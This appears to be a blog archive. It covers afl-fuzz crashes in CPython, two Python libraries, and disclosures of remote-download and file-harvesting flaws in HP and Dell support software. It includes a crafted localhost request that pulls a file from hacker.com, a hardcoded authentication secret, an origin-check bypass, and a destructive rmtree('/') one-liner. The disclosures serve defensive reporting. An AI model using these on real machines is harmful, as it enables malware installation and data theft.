Segfaulting Python with afl-fuzz

American Fuzzy Lop is both a really cool tool for fuzzing programs and an adorable breed of bunny. In this post I'm going to show you how to get the tool (rather than the rabbit) up and running and find some crashes in the CPython interpreter.

Fuzzing?

Explaining in detail what fuzzing is would be a post in itself, so here is the summary from the Wikipedia article:

Fuzz testing or fuzzing is a software testing technique, often automated or semi-automated, that involves providing invalid, unexpected, or random data to the inputs of a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. Fuzzing is commonly used to test for security problems in software or computer systems. It is a form of random testing which has been used for testing hardware or software.

In layman's terms it's the equivalent of "throwing enough shit at a wall to see what sticks". For example, if you have an MP3 player written in a memory-unsafe language like C or C++, fuzzing might involve taking a valid MP3 file, changing parts of it and then attempting to play it. If the player is coded correctly any invalid file will result in an error, whereas if it isn't the program will crash. Repeat this 1,000,000 times and you might find a lot of different bugs.
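That "change parts of the file" step can be sketched in a few lines of Python. This is a deliberately dumb mutation fuzzer, and the play_mp3 command is a hypothetical stand-in for whatever target you're testing; real fuzzers are far smarter than this:

```python
import random
import subprocess

def mutate(data: bytes, n_flips: int = 8) -> bytes:
    """Overwrite a few random bytes in the input with random values."""
    buf = bytearray(data)
    for _ in range(n_flips):
        buf[random.randrange(len(buf))] = random.randrange(256)
    return bytes(buf)

def fuzz_once(seed_path: str, out_path: str) -> int:
    """Write one mutated copy of the seed and run the target on it."""
    with open(seed_path, "rb") as f:
        mutated = mutate(f.read())
    with open(out_path, "wb") as f:
        f.write(mutated)
    # 'play_mp3' is a hypothetical target program.
    result = subprocess.run(["play_mp3", out_path])
    return result.returncode  # a negative value means it was killed by a signal
```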

That's the long and short of it. AFL has some really clever tricks up its sleeve to make this process more efficient, to the point where it can make up JPEG images from just running a JPEG parser or write valid Bash scripts. That's pretty awesome and made me want to have a crack at Python, specifically the CPython interpreter.

Setting up afl-fuzz

For best results use Linux - OSX has some performance issues that make afl really slow and Windows isn't supported. The instructions below assume Ubuntu since that's what I used.

Downloading and compiling afl was really painless. Other than build-essential I didn't have to install any dependencies.

➜ ~ sudo apt-get install build-essential
➜ ~ wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
➜ ~ tar xvf afl-latest.tgz && cd afl-2.06b
➜ ~ make -j8

After building the project with make you will have a few executables in the current directory including afl-gcc, afl-fuzz and afl-whatsup.

Fuzzing Python

Now that we have our afl-fuzz executable we need a program for it to fuzz. To let afl fuzz a program it must meet two requirements: it must be compiled with afl-gcc (or afl-g++), and it must accept its input as a file name passed on the command line or via stdin (no sockets, for example). When afl starts fuzzing it generates testcases using something akin to black magic, writing each case to a file in a directory. It then invokes the target program with the path to that file, e.g. my-program /afl/testcase1. The target should read the file and do something with it, and because it is compiled with the special afl-gcc/g++ compilers, afl-fuzz can see which parts of the program executed. If it sees that a testcase made the program execute in a new way it starts building new testcases around it, allowing it to slowly map out large portions of the target and, in theory, find edge-cases that cause it to crash.
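That "build new testcases around interesting ones" idea is the heart of coverage-guided fuzzing. Here's a toy sketch of the loop, with coverage reduced to a set of ids the target reports back; afl's real instrumentation and mutation strategies are vastly more sophisticated:

```python
import random

def coverage_guided_fuzz(target, seeds, iterations=1000):
    """target(data) returns the set of coverage ids hit by that input."""
    queue = list(seeds)
    seen = set()
    for data in queue:
        seen |= target(data)
    for _ in range(iterations):
        parent = random.choice(queue)
        child = bytearray(parent)
        # Flip a single random bit of a random byte.
        child[random.randrange(len(child))] ^= 1 << random.randrange(8)
        child = bytes(child)
        cov = target(child)
        if cov - seen:            # this input reached new code
            seen |= cov
            queue.append(child)   # future mutations build on it
    return queue, seen
```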

So I reasoned the simplest way to do this was to download the CPython source code, compile the interpreter with afl-gcc and run it through afl-fuzz. The stock interpreter already accepts a file of code to execute, because that's what it's built to do. Let's go grab the source code:

➜ ~ sudo apt-get install mercurial
➜ ~ cd ~
➜ ~ hg clone https://hg.python.org/cpython
➜ ~ cd cpython
➜ ~ hg checkout 3.5
➜ ~ CC=~/afl-2.06b/afl-gcc ./configure && make -j8

The configure script reads the name of the C compiler from the CC environment variable. By passing CC=~/afl-2.06b/afl-gcc you're telling it to use afl-gcc as the C compiler to build the interpreter. If you've done it right you should see lines like this in the output:

afl-as 2.06b by <[email protected]>
[+] Instrumented 97 locations (64-bit, non-hardened mode, ratio 100%).
../afl-gcc -pthread -c -Wno-unused-result -Wsign-compare -Wunreachable-code -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes    -Werror=declaration-after-statement   -I. -IInclude -I./Include    -DPy_BUILD_CORE -o Parser/grammar.o Parser/grammar.c
afl-cc 2.06b by <[email protected]>

So now we have our special interpreter, there is one more thing to do before we run it through afl-fuzz: make some test cases. afl-fuzz works best if you give it some example inputs to start with, so create some files in a directory like ~/python_testcases and fill them with simple Python syntax constructs, e.g.:

class ABC(object):
    def x(self):
        for i in range(10):
            y = i + 2
            yield y

o = ABC()
print(list(o.x()))

Then invoke afl-fuzz like so:

➜ ~ ~/afl-2.06b/afl-fuzz -i python_testcases -o fuzz cpython/python @@

You should see a screen like the one below:

Fuzzing Python fast

Notice something about the image above?

Damn. That's terrible. We are never going to get anywhere with 20 executions a second - we need millions and millions to get good results. Lucky for us there is a trick we can use to greatly improve that speed.

Use llvm-mode and Python Bytecode files

Currently our target program is the CPython interpreter itself, which has a fairly large startup overhead. This includes reading the user environment, possibly executing a user's site.py file, etc. This is slow. We are also feeding it actual Python source code, which has to be parsed into bytecode before being executed - another avoidable overhead. CPython actually stores this parsed bytecode on disk, as file_name.pyc in Python 2 and inside a __pycache__ directory in Python 3. These files are just an optimization so that the interpreter doesn't have to constantly re-parse the source files, but the interpreter can execute them directly, and afl-fuzz happens to work much better with binary formats than textual ones. To avoid the startup and parsing overhead we need to make a stripped-down interpreter.
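You can poke at these bytecode files from Python itself. A quick sketch: the first four bytes of a pyc file are a magic number that changes with every interpreter version, which is why a pyc compiled by one Python version won't load in another:

```python
import py_compile
import importlib.util

# Compile a trivial source file to bytecode.
with open("example.py", "w") as f:
    f.write("print('hello')\n")
pyc_path = py_compile.compile("example.py")

with open(pyc_path, "rb") as f:
    header = f.read(4)

# The magic number identifies the interpreter version that produced the file.
print(header == importlib.util.MAGIC_NUMBER)  # True
```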

I've never actually written anything more than "hello world" in C, so this was a bit of a learning curve. After reading the Python C documentation I figured the best way to go was to use PyRun_AnyFileEx. I made a new file inside cpython/Programs/ called test.c to hold my stripped-down program, and after a bit of tinkering I wrote the following C:

#include <Python.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
    Py_NoSiteFlag = 1;
    Py_InitializeEx(0);
#ifdef __AFL_HAVE_MANUAL_CONTROL
    __AFL_INIT();
#endif
    FILE *f = fopen(argv[1], "rb");
    if (f == NULL) {
        return 1;
    }
    if (PyRun_AnyFileEx(f, argv[1], 1) == -1) {
        printf("fail");
    }

    Py_Finalize();
    return 0;
}

The __AFL_INIT() call above is a special experimental feature of afl that greatly increases the speed of our fuzzing. In short it enables you to 'defer initialization' of afl until after any expensive setup the program has to perform. In this case the Py_InitializeEx function is pretty slow, so we place __AFL_INIT() after it; when afl fuzzes the program, each run effectively starts from the point after Py_InitializeEx has been called. This skips repeating the slow startup and speeds fuzzing up a lot, because we want to fuzz the PyRun_AnyFileEx function and not waste time running Py_InitializeEx() over and over again. To enable this you have to compile a special afl tool called afl-clang-fast:

➜ ~ pushd ~/afl-2.06b/llvm_mode/
➜ ~ sudo apt-get install clang llvm-dev llvm
➜ ~ make
➜ ~ popd

And then run ./configure again with afl-clang-fast instead of afl-gcc:

➜ ~ CC=~/afl-2.06b/afl-clang-fast CXX=~/afl-2.06b/afl-clang-fast++ ./configure

This step is optional though; everything works fine without it.

Now that we have our target program we need to make it build. Getting this bit working took a while because I had no idea what I was doing. In the end I manually added this code to the $(BUILDPYTHON) Makefile target:

# Build the interpreter
$(BUILDPYTHON): Programs/python.o $(LIBRARY) $(LDLIBRARY) $(PY3LIBRARY)
    $(LINKCC) $(PY_LDFLAGS) $(LINKFORSHARED) -o $@ Programs/python.o $(BLDLIBRARY) $(LIBS) $(MODLIBS) $(SYSLIBS) $(LDLAST)

    # New lines here:
    $(MAINCC) -c $(PY_CORE_CFLAGS) -o $(srcdir)/Programs/test.o $(srcdir)/Programs/test.c
    $(LINKCC) $(PY_LDFLAGS) $(LINKFORSHARED) -o Programs/test Programs/test.o $(BLDLIBRARY) $(LIBS) $(MODLIBS) $(SYSLIBS) $(LDLAST)

Yes, this is probably horrible and not the proper way to do it, but it works. After running make -j8 you will have a file called test inside Programs. If make errors out, don't worry - as long as the file is there it will execute fine.

Running afl-fuzz

We have everything set, let's find some crashes. Compile your Python testcases to pyc files with this command (use an interpreter matching the version you built, since pyc files are version-specific):

➜  ~ python3.5 -m compileall python_testcases
➜  ~ cp python_testcases/__pycache__/* python_testcases
➜  ~ mv python_testcases/*.py .

And then execute afl-fuzz. The -f input.pyc flag forces the input file to have a .pyc extension, which Python requires when running bytecode files:

➜  ~ afl-2.06b/afl-fuzz -i python_testcases -o fuzz -f input.pyc cpython/Programs/test @@

You should see the following screen:

Notice the speed: 373.4/sec, up from 20! And we've already found 100 unique crashes!

And just to confirm that those crashes are real and not an artifact of our special program, we can try them on the system Python:

➜  ~ cp fuzz/crashes/id:000000,sig:11,src:000000,op:flip1,pos:13 test.pyc
➜  ~ python3.5 test.pyc
[1]    3689 segmentation fault  python3.5 test.pyc

It's worth pointing out here that this isn't really a problem or any kind of security risk. pyc files are internal to CPython and not many validation checks are run on them. If you're in a position to send someone a malicious pyc file, a far more damaging thing to do would be to simply execute __import__('shutil').rmtree('/', ignore_errors=True) rather than crash the process.

Conclusion

So we've got afl-fuzz to find some real crashes in the CPython interpreter by fuzzing its bytecode. We've also discovered that there are a lot of crashes and that the interpreter doesn't really protect itself against invalid bytecode, which takes a bit of the fun away.

The next step is to fire up a debugger like gdb and use it to explore why the bytecode crashes the interpreter. I'm going to write a post on how to do this in the near future because it's quite lengthy and this post is already long enough, but as a sample the first segfault afl found was in this code:

for (i = 0; i < n_cellvars; i++) {
    Py_ssize_t j;
    PyObject *cell = PyTuple_GET_ITEM(cellvars, i);
    for (j = 0; j < total_args; j++) {
        PyObject *arg = PyTuple_GET_ITEM(varnames, j);
        if (!PyUnicode_Compare(cell, arg)) {
            cell2arg[i] = j;
            used_cell2arg = 1;
            break;
        }
    }
}

The issue is that PyObject *arg = PyTuple_GET_ITEM(varnames, j); can return null if varnames is an empty tuple (which it can be if the pyc file is malformed). No null check is done on arg before it is passed to PyUnicode_Compare, which causes a segfault.

Scraping websites with Cyborg

I often find myself creating one-off scripts to scrape data off websites for various reasons. My go-to approach for this is to hack something together with Requests and BeautifulSoup, but this was getting tiring. Enter Cyborg, my library that makes writing web scrapers quick and easy.

Cyborg is an asyncio-based, pipeline-oriented scraping framework. In English, that means you create a couple of functions to scrape individual parts of a site and throw them together in a sequence, with each of those parts running asynchronously and in parallel. Imagine you had a site with a list of users and you wanted to get the age and profile picture of each of them. Here's how this is done in Cyborg, showing off some of the cool features:

from cyborg import Job, scraper
from aiopipes.filters import unique
import sys

@scraper("http://somesite.com/list_of_users")
def scrape_user_list(data, response, output):
    for user in response.find("#list_of_users > li"):
        yield from output({
            "username": user.get(".username").text
        })

@scraper("http://somesite.com/user/{username}")
def scrape_user(data, response):
    data['age'] = response.get(".age").text
    data['profile_pic'] = response.get(".pic").attr["href"]
    return data

if __name__ == "__main__":
    pipeline = Job("UserScraper") | scrape_user_list | unique('username') | scrape_user.parallel(5)
    pipeline > sys.stdout
    pipeline.monitor() > sys.stdout
    pipeline.run_until_complete()

That's it! The idea behind Cyborg is to keep the focus on the actual scraping while getting the things that are usually hard - parallel tasks, error handling and monitoring - for free.

The library is very much in alpha, but you can find the project here on GitHub. Feedback welcome!

Our pipeline

Our pipeline is defined like so:

pipeline = Job("UserScraper") | scrape_user_list | unique('username') | scrape_user.parallel(5)
pipeline > sys.stdout

The Job() class is the start of our pipeline and it holds information like the name of the task ('UserScraper'). We use the | operator to add tasks to the pipeline, the first one being scrape_user_list. Any output from that task is passed to unique, which as you may have guessed filters out duplicate usernames that may be produced. This then passes output to the scrape_user function, and the .parallel(5) means start 5 parallel workers to process usernames.

The > operator is used to pipe the output of the pipeline to the standard output, but this could be any file-like object or function instead. This means you could write an import_into_database function that takes scraped data and uses SQL to add it to a database.
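As a sketch of what such a sink might look like (written standalone here with sqlite3; the exact call signature Cyborg expects of a sink function may differ):

```python
import sqlite3

# In-memory database for illustration; use a file path in real use.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE IF NOT EXISTS users (username TEXT, age TEXT)")

def import_into_database(record):
    # Each record is a dict produced by the last scraper in the pipeline.
    db.execute(
        "INSERT INTO users (username, age) VALUES (?, ?)",
        (record["username"], record["age"]),
    )
    db.commit()

# Then, instead of piping to stdout:
# pipeline > import_into_database
```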

A key aim of Cyborg is to make monitoring the pipeline simple. The pipeline.monitor() > sys.stdout handles this for us by piping status information every second to the standard output. Below is some sample output from a real version of our pipeline (one that handles pagination and does a bit more work). You can see a progress bar for each task, including the 5 scrape_user workers. Error totals are also displayed here, if there are any.

UserScraper: 3 pipes
Runtime: 9 seconds
 |-------- scrape_user_list
           Input: 14/26 read.  53% done
           [=========*          ]  14/26
           Tasks:
 |-------- unique 
           Input: 825/825 read. 100% done
           [===================*] 825/825
 |-------- scrape_user
           Input: 8/825 read.   0% done
           [*                   ]   8/825
           Tasks:
  |------- [*                   ]   3/66
  |------- [*                   ]   3/92
  |------- [===*                ]   5/22
  |------- [===============*    ]   8/10

Scrapers

A scraper is a function decorated with @scraper, with the first argument being the page URL that is to be scraped. The response to that URL is passed as a parameter to the function, and the function should parse it to extract relevant information.

The scrape_user_list function is fairly simple: it fetches a static URL (/list_of_users) and runs a CSS query on the response to find the HTML elements we are interested in. It then uses yield from output(...) to pass a dictionary to the next stage of the pipeline. We need a yield from statement here because our scraper could produce an arbitrary number of outputs, and yield from ensures that output is buffered until tasks further down the pipeline are ready to handle it.

The dictionary produced by scrape_user_list is used to format the scrape_user URL. So if scrape_user_list produces {'username': 'test'} then scrape_user's URL resolves to /user/test. This is then fetched, the age and profile picture are extracted from the response, and the result is passed on. As this is the last function in the pipeline, its output is written to stdout in JSON format.
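The URL templating itself is just standard Python string formatting (presumably what Cyborg does internally, though that's an assumption about its implementation):

```python
# The scraper's URL template, filled in with the dict from the previous stage.
template = "http://somesite.com/user/{username}"
data = {"username": "test"}
url = template.format(**data)
print(url)  # http://somesite.com/user/test
```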

The library itself

The library is pretty new. I wrote a 'draft' version that I wasn't very happy with, and this is a re-write much closer to what I had originally imagined. You can find the code on GitHub, or use pip install cyborg to install it locally.

HtmlToWord is now WordInserter

I've released a redesign of my HtmlToWord library, specifically it now supports Markdown and multiple different ways to interact with Word. It's now also been renamed to WordInserter to reflect this.

Originally HtmlToWord was designed to take HTML input, process it and insert a representation of it into a Word document. I made this for a project at work that involved taking HTML input from a user (created using a WYSIWYG editor) and generating a Word document containing it. I was surprised to find no native way to do this in Word (other than emulating copy+paste, eww), so I made and released HtmlToWord. That library was tied directly to HTML: each supported tag was an individual class responsible for rendering itself.

This quickly got messy, and a later version of the work project used Markdown instead, so I decided to re-write the library from scratch to handle both. HtmlToWord used the HTML input to create a number of objects, one for each tag, and then called a Render method on each of them. As WordInserter needs to process both HTML and Markdown I decided to properly decouple the parsing from the rendering, otherwise the library would be full of duplicate code. It now takes any supported input and creates a tree of operations to perform, which is then recursively fed to a specific renderer responsible for processing it.
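A minimal sketch of that parse/render decoupling, with hypothetical names (the real WordInserter operation tree is much richer than this):

```python
class Paragraph:
    """One node in the operation tree; real nodes carry formatting too."""
    def __init__(self, text, children=None):
        self.text = text
        self.children = children or []

def parse_fake_markup(lines):
    # Stand-in for the HTML/Markdown parsers: build a tree of operations.
    return [Paragraph(line) for line in lines]

class TextRenderer:
    """One renderer per output target; a COM Word renderer shares this shape."""
    def render(self, nodes):
        out = []
        for node in nodes:
            out.append(node.text)
            if node.children:
                out.append(self.render(node.children))
        return "\n".join(out)

# Any parser's output can be fed to any renderer.
tree = parse_fake_markup(["Hello", "World"])
print(TextRenderer().render(tree))
```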

The result is that the code is a lot cleaner and more maintainable, and it supports different ways to take the input and insert it into Word. Currently only COM is supported, but in the future, if other projects that directly manipulate .docx files mature a bit, I can create a renderer that works on Linux.

Using the library is super simple:

from wordinserter import render, parse
from comtypes.client import CreateObject

# This opens Microsoft Word and creates a new document.
word = CreateObject("Word.Application")
word.Visible = True # Set this to False in production!
document = word.Documents.Add()
from comtypes.gen import Word as constants

markdown = """
### This is a title

![I go below the image as a caption](http://placehold.it/150x150)

*This is **some** text* in a [paragraph](http://google.com)

  * Boo! I'm a **list**
"""

operations = parse(markdown, parser="markdown")
render(operations, document=document, constants=constants)

I have also created an automated test script that renders a bunch of HTML and Markdown documents in both Firefox and Word. This is used to make a comparison document to quickly find any regressions or issues. Judging by the number of installs from PyPI and the number of other contributors to the GitHub project, this library is useful to some people; I hope they take a look at the redesign.

Here is a snapshot of the top of the comparison page:

HP Support Solutions Framework Security Issue

After discovering the flaw in Dell's System Detect software I looked into other similar software for issues. This post details two issues I found with the HP Product Detection software and explores the protections HP put in place. I'm also going to explain how these could be easily bypassed, allowing an attacker to force files to be downloaded and to read arbitrary files, registry keys and system information through the user's browser with little or no interaction.

Timeline:

HP were incredibly prompt at fixing the issue and responding to communications. They have addressed these problems in a new version (11.51.0049) and have issued a security notification, available here. An updated version can (and should) be downloaded from their support page

  • 25/3/2015 - Contacted HP with a writeup and received an acknowledgement that it has been passed to the relevant software team
  • 10/4/2015 - Received notification that the vulnerability has been fixed

Summary

Many large hardware vendors offer tools that automatically detect the hardware configuration of users' machines and take them straight to the exact drivers they require. Just like Dell, HP feature this software prominently on their support landing page.

Unfortunately just like Dell the HP software contains a number of functions that you wouldn't expect. When you click "Find Now" you are actually downloading the complete HP Support Solutions Framework which includes functionality to:

  • Read arbitrary files and registry keys
  • Collect system information
  • Summarize installed drivers and devices
  • Initiate the HP Download Assistant to download arbitrary files

The program attempts to send any collected data back to HP servers and tries to stop anyone but HP support staff accessing it, but as I will demonstrate these checks are easily bypassed. Due to the nature of the software, any of these functions can be invoked by any web page you visit without any notification, and combined with the fact that the program shows no visible sign of running and starts with the machine automatically, this makes it a very dangerous piece of software.

The juicy details

As previously stated, the software installs a service on your computer that listens for HTTP requests on localhost:8092. The JavaScript in your browser then communicates with this service by making AJAX requests to that local port. The screenshot below shows the page fetching the version information of the installed software:

When a browser makes an HTTP request it adds some information to the headers about the page or context that initiated the request, in the Referer (yes, spelt like that) and Origin headers. Under normal circumstances these requests would be coming from the HP support site, so the Referer header might have a value of http://www8.hp.com/uk/en/drivers.html.

So let's get right into the code and see how these headers are used. After decompiling the software we find the following (abbreviated) function inside SolutionsFrameworkService.SsfWebserver:

private void GetContextCallback(IAsyncResult result)
{
   string uriString;
   if (request.QueryString.Get("callback") != null)
      uriString = request.Headers["Referer"] ?? "http://hp.com";
   else
     uriString = request.Headers["Origin"] ?? "http://hp.com";

   if (!new Uri(uriString).GetComponents(UriComponents.Host, UriFormat.Unescaped).EndsWith("hp.com"))
   {
     ... error
   }
   else
   {
     ... process request
   }
}

The line we need to focus on is this:

if (!new Uri(uriString).GetComponents(UriComponents.Host, UriFormat.Unescaped).EndsWith("hp.com"))

In English this translates to "accept the request if the hostname ends with hp.com", which is the only authentication the program performs. On the face of it this might look like a perfectly valid way to ensure that an HTTP request came from a valid HP domain, but it is critically flawed: the check passes for any domain ending in hp.com, so if a hacker were to register the domain nothp.com and make a request from there it would be accepted. Apart from giving me déjà vu, this gives me a foot in the door - any command I issue will be processed by the software. So let's see what commands can be processed.
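The flaw is easy to demonstrate. This sketch mirrors the decompiled logic in Python, with nothp.com standing in for a hypothetical attacker-registered domain:

```python
from urllib.parse import urlparse

def hp_check(uri):
    # Mirrors the decompiled check: accept if the hostname ends with "hp.com".
    return urlparse(uri).hostname.endswith("hp.com")

print(hp_check("http://www8.hp.com/uk/en/drivers.html"))  # True - legitimate
print(hp_check("http://nothp.com/evil"))                  # True - attacker-controlled!
```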

Triggering a download

When the program processes a request it inspects the first two components of the requested path. The first is used to look up a controller, and the second component (if present) specifies the method. In the Chrome screenshot above it is making a request to the version controller, which has one default action that returns the software version. Looking through the source there are several interesting controllers, but we shall start with the HPDIAcontroller which is used to drive the "HP Download and Install Assistant". The actual code is pretty convoluted and not particularly relevant, but what is interesting is that if we make a request to (some unimportant parameters omitted):

http://localhost:8092/hpdia/run?RemoteFile=https://hacker.com/messbox.exe&FileTitle=update.exe

This triggers the download assistant to start, which brings itself to the foreground and downloads the file:

I looked long and hard, but the software doesn't automatically install anything without user interaction. However, this doesn't render the attack useless - far from it. The attacker is able to control the displayed file title ("update.exe" in the screenshot) and can completely hide the real executable name by calling it "_.exe", which causes the download assistant to display "(.exe)" after it. One redeeming feature of the software is that it only accepts download requests for files served over HTTPS.

If an inexperienced user were to visit a malicious page that looked like a real HP site telling them to update their software, and the HP download manager popped up, I think many might press install, which would execute the attacker's malware and compromise their machine. For some advanced malware, merely being downloaded could be enough.

Edit: Funnily enough I told my housemate about this and he said he had the HP download assistant pop up once while browsing a "dodgy torrent site". Perhaps this was already known?

Harvesting users information

The software contains a large number of "harvesters" (named so in the code) which can be used to steal files from the user's machine and read other system information like registry keys or driver details. This attack is a bit more complex and targeted than the one above, but could be even more dangerous if executed correctly.

When an HP support technician attempts to diagnose problems with a customer's computer they may need to read specific files, or access other possibly sensitive information, on the user's machine. The normal and legitimate steps taken by the software when a technician wishes to read information from the user's machine are as follows (please excuse my terrible diagrams):

  1. The support technician issues a request to the program instructing it to run the "idfservice" controller
  2. This controller then makes an HTTP request to the host diagsgmdextpro.houston.hp.com, with the product line of the HP machine the user is using. This returns a list of files to harvest
  3. The program then reads the specified portions of the files and sends them back to diagsgmdextpro.houston.hp.com
  4. The support technician presumably accesses this information to diagnose any issues.

You can view an example of the servers response by visiting the following URL: http://diagsgmdextpro.houston.hp.com/ediags/solutions/harvestertemplate?productLine=KV, and below is a snippet of the result that instructs the software to read a registry key:

<TemplateFile>
   <FileName>Hewlett-Packard\\HPActiveSupport\\Version</FileName>
   <MatchType>regex</MatchType>
   <Matches>
      <MatchExpression i:nil="true"/>
      <Matches>
         <MatchData>
            <MatchExpression>
                ^HPSAVer: (\d{1,5}[.]\d{1,5}[.]\d{1,5}[.]\d{1,5}|[a-zA-z]+)$
            </MatchExpression>
            <Name>HPSAver</Name>
         </MatchData>
      </Matches>
      <Name i:nil="true"/>
   </Matches>
   <Source>registry</Source>
</TemplateFile>

This isn't actually a terrible system, because the program contacts an authoritative service to retrieve the list of files to harvest rather than accepting that list from the client directly.

So how can an attacker exploit this? They need to trick the application into connecting to their server instead of one hosted by HP. One possible way is a DNS spoofing attack (like DNS cache poisoning), so that the domain diagsgmdextpro.houston.hp.com resolves to an IP address they control. Another is to man-in-the-middle the connection, since the software sends and receives data over plaintext HTTP. Exactly how to do this is outside the scope of this post, but it is possible.

Once done, the attacker can make the request to the user's software and it will connect back to a machine they control, which will instruct the software to read any file they choose. Thus the following happens:

  1. Attacker triggers the users browser into making a crafted request to the idfservice controller
  2. Program resolves diagsgmdextpro.houston.hp.com to an attacker-controlled IP and makes a request for files to read. The attacker returns a list of files they want to read
  3. The program collects these files and sends them back to the diagsgmdextpro address, simply giving the data to the attacker.

As you can see from the sample XML above, each bit of data read has to pass a filter in the form of a regular expression. We can simply use the expression .* to match the entire file. In the screenshot below I have made a simple web application that serves a malicious page instructing the software to read C:\secret.txt and the user's system information. The console window to the left shows that the program has dutifully sent the data to the attacker-controlled server.

Conclusion

I've described two flaws with the HP Solutions Framework that can be exploited to potentially compromise a user's machine with little or no user interaction. While the first attack is not as bad as Dell's (which requires no user interaction at all) it could be just as dangerous to nontechnical users, who might not consider a random HP download window popping up to be suspicious.

The second attack is more targeted than the first and requires more setup, but could be used to read sensitive user documents or information and pass them back to the attacker. This should be mitigated first by using HTTPS and second by explicitly verifying the server's SSL certificate, to ensure the software is connecting to a valid HP-controlled server.

While I don't want to be too critical of HP because their response was prompt and speedy I do think that their security procedures are lacking if such software can be published by them. That being said they do make it clear to users that they are downloading the entire Support Solutions Framework and explain the functionality it includes.

Dell System Detect RCE vulnerability

I recently discovered a serious flaw with Dell System Detect that allowed an attacker to trigger the program to download and execute an arbitrary file without any user interaction. Below is a summary of the issue and the steps taken to bypass the protections Dell put in place.

Timeline:

The issue was fixed within two months and Dell were clear in their communications throughout.

  • 11/11/2014 - Contacted Dell about the issue and received an acknowledgement
  • 14/11/2014 - Received confirmation that Dell's Internal Assessment team is investigating
  • 9/1/2015 - Dell state that they have fixed the issue by introducing additional validation and obfuscation
  • 10/1/2015 - Checked patched program and could not reproduce this exploit
  • 23/3/2015 - This post is published

Summary

Anyone who has owned a Dell will be familiar with the Dell Support page. You can get all the latest drivers for your exact machine configuration from this site by entering your Dell Service Tag, which can be found on a sticker somewhere on your machine or through clicking the shiny blue "Detect Product" button.

Clicking this button prompts you to download and install the "Dell System Detect" program, which is used to auto fill the service tag input and show you the relevant drivers for your machine.

While investigating this rather innocuous looking program I discovered that it accepts commands by listening for HTTP requests on localhost:8884 and that the security restrictions Dell put in place are easily bypassed, meaning an attacker could trigger the program to download and install any arbitrary executable from a remote location with no user interaction at all.

The interesting bit

Once installed, the "Dell System Detect" program sits in your taskbar and starts itself with your machine. So this program is clearly part of the process of autodetecting the service tag, but how does the browser page communicate with it? You can use Chrome's excellent developer tools to view the network traffic of the page and see that it makes several requests to a service listening on localhost port 8884:

Ok, so it seems that Dell System Detect runs an HTTP server that listens for requests, which are sent from the Dell Support page's JavaScript. So let's take a closer look at the program - it's a .NET 2.0 executable and can be completely decompiled with dotPeek into a set of Visual Studio solutions. A quick search through the code for "http" brings us to eSupport.Common.Client.Service.RequestHandlers.ProcessRequest, which is responsible for processing a request received on the process's HTTP port. Below is an abbreviated snippet showing how this function checks that requests come from a valid Dell domain:

public void ProcessRequest(HttpListenerContext context)
{
    String url = "";
    if (context.Request.UrlReferrer == null) url = context.Request.Headers["Origin"];
    else url = context.Request.UrlReferrer.AbsoluteUri;

    if (url.Contains("dell"))
    {
        if (context.Request.HttpMethod == "GET")
          this.HandleGet(context);
        else if (context.Request.HttpMethod == "POST")
          this.HandlePost(context);
        ...
    }
}

So that's our first issue: the program attempts to verify that the request was sent from a Dell domain only by checking whether the string "dell" appears anywhere in the HTTP Referrer or Origin headers. Why is this a problem? The HTTP Referrer can contain the full request URI, including the host and path. This means an attacker could easily serve a page from a URL like "http://hacker.com/dell", and the resulting requests would pass the initial test because "dell" is in the string.
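To make the weakness concrete, here's a minimal Python sketch of the substring check the decompiled code performs (the attacker URLs are hypothetical examples):

```python
# Recreate the naive check from ProcessRequest: the request is "trusted"
# if the string "dell" appears anywhere in the Referrer/Origin URL.
def is_trusted(url):
    return "dell" in url

# A genuine Dell page passes, as intended...
print(is_trusted("http://www.dell.com/support"))  # True
# ...but so does any attacker-controlled URL containing "dell".
print(is_trusted("http://hacker.com/dell"))       # True
print(is_trusted("http://evildellhacker.com/"))   # True
```

Any page an attacker hosts can trivially satisfy this check just by putting "dell" somewhere in its path or hostname.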

Armed with this information we can make requests to the program that are at least partially processed. Inside each of the method handlers (HandleGet, HandlePost) there is a fair bit of messy code, but below is a simplified version:

private void HandleGet(HttpListenerContext context)
{
  string[] urlParts = context.Request.Url.AbsolutePath.Split('/');
  MethodInfo method = FindService(urlParts[0], urlParts[1]);

  string signature = context.Request.QueryString["signature"];
  string expires = context.Request.QueryString["expires"];
  bool verified = new AuthenticationHandler().Authenticate(urlParts[0], urlParts[1], expires, signature);
  if (!verified) { Error(); return; }

  var result = method.Invoke(GetParameters(context.Request));
  MakeResponse(result);
}

This function splits the request URL by the slash and uses the first two components to find the correct service to execute. In the Chrome screenshot above we see that the web page is making a request to clientservice/isalive, which means the program will execute the isalive method in the clientservice service.
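To see what the split actually produces, here's a quick Python illustration. Note that AbsolutePath begins with a slash, so the first element of the split is an empty string; the real code presumably skips this leading element, which the simplified C# above glosses over:

```python
# How a request path maps to a service/method pair.
path = "/clientservice/isalive"
parts = path.split("/")
print(parts)  # ['', 'clientservice', 'isalive']

# Skipping the empty leading element gives the service and method.
service, method = parts[1], parts[2]
print(service, method)  # clientservice isalive
```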

After the service has been found it inspects two query string parameters, signature and expires, and passes them to the Authenticate method. If this passes then the service is invoked with other query string parameters as arguments.

It seems obvious by now that the program does a little bit more than simply retrieve your service tag, so before we look into the Authenticate method let's see what interesting things we can do.

Services

There are three services that can be used: diagnosticservice, downloadservice and clientservice. Within these are 25 methods, including getservicetag, getdevices, getsysteminfo, checkadminrights and downloadfiles. It seems that the entire Dell system support package is included with System Detect, meaning if we can bypass the authentication then we can trigger any of these methods.

The most interesting method is called downloadandautoinstall, which does exactly what it says on the tin.

[ServiceName("downloadservice")]
public class DownloadServiceLogic
{
    [RemoteMethodName("downloadandautoinstall")]
    public static ServiceResponse DownloadAndAutoInstall(string files)
    {
        // Download and execute URLs passed in the files parameter without prompting the user
    }
}

If we can bypass the Authenticate method then we can trigger this function, which will download and execute whatever file we tell it to, by making a request to http://localhost:8884/downloadservice/downloadandautoinstall. So let's take a look at the Authenticate method, which is the only thing stopping us:

public bool Authenticate(string service, string method, string expiration, string signature)
{
    var secret = string.Format("{0}_{1}_{2}_{3}", service, method, expiration, "37d42206-2f68-48be-a09a-9f9b6424ad85");
    var hash = new SHA256Managed().ComputeHash(Encoding.UTF8.GetBytes(secret));

    string stringToEscape = Convert.ToBase64String(hash).TrimEnd('=');
    bool flag = stringToEscape.ToLower() == signature.ToLower() || Uri.EscapeDataString(stringToEscape).ToLower() == signature.ToLower();
    if (!flag)
